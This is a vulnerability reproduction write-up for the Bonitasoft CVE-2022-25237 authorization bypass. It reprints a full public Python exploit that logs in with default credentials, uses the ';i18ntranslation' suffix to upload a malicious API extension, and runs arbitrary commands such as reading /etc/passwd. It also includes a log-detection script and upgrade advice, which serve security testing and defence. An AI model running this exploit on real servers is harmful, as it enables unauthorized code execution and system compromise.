Bonitasoft Platform RCE Vulnerability Reproduction (CVE-2022-25237)


1. Product overview: Bonitasoft is a business automation platform that makes it easier to build, deploy and manage automation applications within business processes; Bonita is an open-source, extensible platform for business process automation and optimization.

2. Vulnerability overview: In affected Bonitasoft versions, a configuration issue in the API authorization filter allows authorization to be bypassed by appending a specially crafted string to an API URL. An attacker holding only an ordinary user account can, after bypassing authorization, deploy malicious code to the server and achieve remote code execution.

3. Affected versions

Community edition: below 2022.1-u0 (7.14.0)

Subscription edition: below 2022.1-u0 (7.14.0)

below 2021.2-u4 (7.13.4)

below 2021.1-0307 (7.12.11)

below 7.11.7

4. Environment setup: the vulnerability was reproduced on the vulfocus online range.

5. Exploitation flow: (1) Open the range environment and log in with the default credentials install/install;

(2) Create an ordinary user;

(3) Run the publicly available PoC.

Project URL: CVEs/CVE-2022-25237 at master · RhinoSecurityLabs/CVEs · GitHub

  

```python
# ## Information
# **Description:** This vulnerability allows authorization bypass and remote code execution in Bonitasoft web.
# **Versions Affected:** 2022.1
# **Version Fixed:**
# For community:
# - 2022.1-u0 (7.14.0)
# For subscription:
# - 2022.1-u0 (7.14.0)
# - 2021.2-u4 (7.13.4)
# - 2021.1-0307 (7.12.11)
# - 7.11.7
# **Researcher:** David Yesland (https://twitter.com/daveysec)
# **Disclosure Link:** https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/
# **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2022-25237

import requests
import sys


class exploit:
    # Shared HTTP session and command-line settings, referenced as exploit.<name> below.
    try:
        session = requests.session()
        bonita_user = sys.argv[1]
        bonita_password = sys.argv[2]
        target_path = sys.argv[3]
        cmd = sys.argv[4]
        tempPath = ""
        extension_id = ""
        bonita_default_user = "install"
        bonita_default_password = "install"
        platform_default_user = "platformAdmin"
        platform_default_password = "platform"
    except IndexError:
        print(f"Usage: python3 {sys.argv[0]} <user> <password> http://localhost:8080/bonita cat /etc/passwd")
        exit()


def try_default_logins():
    # First try the stock install/install account before using the supplied credentials.
    req_url = f"{exploit.target_path}/loginservice"
    req_cookies = {"x": "x"}
    req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req_data = {"username": exploit.bonita_default_user, "password": exploit.bonita_default_password, "_l": "en"}
    r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
    if r.status_code == 401:
        return False
        # This does not seem to work when authenticating as platformAdmin, maybe it can though.
        # req_url = f"{exploit.target_path}/platformloginservice"
        # req_cookies = {"x": "x"}
        # req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
        # req_data = {"username": exploit.platform_default_user, "password": exploit.platform_default_password, "_l": "en"}
        # r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
        # if r.status_code == 200:
        #     print(f"[+] Found default creds: {exploit.platform_default_user}:{exploit.platform_default_password}")
        #     return True
    else:
        print(f"[+] Found default creds: {exploit.bonita_default_user}:{exploit.bonita_default_password}")
        return True


def login():
    req_url = f"{exploit.target_path}/loginservice"
    req_cookies = {"x": "x"}
    req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req_data = {"username": exploit.bonita_user, "password": exploit.bonita_password, "_l": "en"}
    r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
    if r.status_code == 401:
        print("[!] Could not get a valid session using those credentials.")
        exit()
    else:
        print(f"[+] Authenticated with {exploit.bonita_user}:{exploit.bonita_password}")


def upload_api_extension():
    # The ";i18ntranslation" suffix is the crafted string that slips past the API authorization filter.
    req_url = f"{exploit.target_path}/API/pageUpload;i18ntranslation?action=add"
    files = [("file", ("rce_api_extension.zip", open("rce_api_extension.zip", "rb"), "application/octet-stream"))]
    r = exploit.session.post(req_url, files=files)
    exploit.tempPath = r.json()["tempPath"]


def activate_api_extension():
    req_url = f"{exploit.target_path}/API/portal/page/;i18ntranslation"
    req_headers = {"Content-Type": "application/json;charset=UTF-8"}
    req_json = {"contentName": "rce_api_extension.zip", "pageZip": exploit.tempPath}
    r = exploit.session.post(req_url, headers=req_headers, json=req_json)
    exploit.extension_id = r.json()["id"]


def delete_api_extension():
    # Clean-up: remove the uploaded page/extension again.
    req_url = f"{exploit.target_path}/API/portal/page/{exploit.extension_id};i18ntranslation"
    exploit.session.delete(req_url)


def run_cmd():
    req_url = f"{exploit.target_path}/API/extension/rce?p=0&c=1&cmd={exploit.cmd}"
    r = exploit.session.get(req_url)
    print(r.json()["out"])


if not try_default_logins():
    print("[!] Did not find default creds, trying supplied credentials.")
    login()
upload_api_extension()
activate_api_extension()
try:
    run_cmd()
except Exception:
    delete_api_extension()
delete_api_extension()
```
Note: CVE-2022-25237.py and rce_api_extension.zip must be placed in the same directory.
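Added here as a defender-side example, not part of the original post or the PoC repository: a small access-log check that flags the `;i18ntranslation` suffix on REST API paths and an extension call that follows a page registration made through it. The log lines, IP addresses, combined-log format and rule names are constructed for the example.

```python
import re

# Constructed sample lines in Apache/Tomcat combined-log style (not real traffic).
# 10.0.0.5 walks the PoC sequence: login, upload a page with the ";i18ntranslation"
# suffix, register it, then call the deployed extension. 10.0.0.9 is ordinary use,
# including a non-API path that happens to carry the same suffix.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2022:10:00:01 +0000] "POST /bonita/loginservice HTTP/1.1" 200 12
10.0.0.5 - - [01/Jun/2022:10:00:02 +0000] "POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1" 200 88
10.0.0.5 - - [01/Jun/2022:10:00:03 +0000] "POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1" 200 410
10.0.0.5 - - [01/Jun/2022:10:00:04 +0000] "GET /bonita/API/extension/rce?p=0&c=1&cmd=id HTTP/1.1" 200 60
10.0.0.9 - - [01/Jun/2022:10:05:00 +0000] "GET /bonita/API/bpm/process?p=0&c=10 HTTP/1.1" 200 1200
10.0.0.9 - - [01/Jun/2022:10:05:01 +0000] "GET /bonita/portal/resource/app/example/;i18ntranslation HTTP/1.1" 200 50
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# ";i18ntranslation" attached as a path parameter anywhere inside a REST API (/API/...) path.
BYPASS_RE = re.compile(r'/API/[^?\s]*;i18ntranslation', re.IGNORECASE)
PAGE_DEPLOY_RE = re.compile(r'/API/portal/page/?;', re.IGNORECASE)
EXTENSION_RE = re.compile(r'/API/extension/', re.IGNORECASE)


def parse_line(line):
    """Split one combined-log line into ip/method/path/status, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    deployed_via_bypass = set()  # source IPs that registered a page through the bypass suffix
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if BYPASS_RE.search(path):
            alerts.append({"ip": ip, "path": path, "rule": "api-auth-bypass-suffix"})
            if rec["method"] == "POST" and PAGE_DEPLOY_RE.search(path):
                deployed_via_bypass.add(ip)
        elif EXTENSION_RE.search(path) and ip in deployed_via_bypass:
            alerts.append({"ip": ip, "path": path, "rule": "extension-call-after-bypass-deploy"})
    return alerts


def alert_rules(log_text):
    """Convenience view: just the rule names that fired, in order."""
    return [a["rule"] for a in detect(log_text)]
```

The second rule only fires for a source that already registered a page through the bypass, so routine calls to legitimately deployed extensions are not flagged on their own.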

 

6. Remediation: upgrade to a fixed version.

  
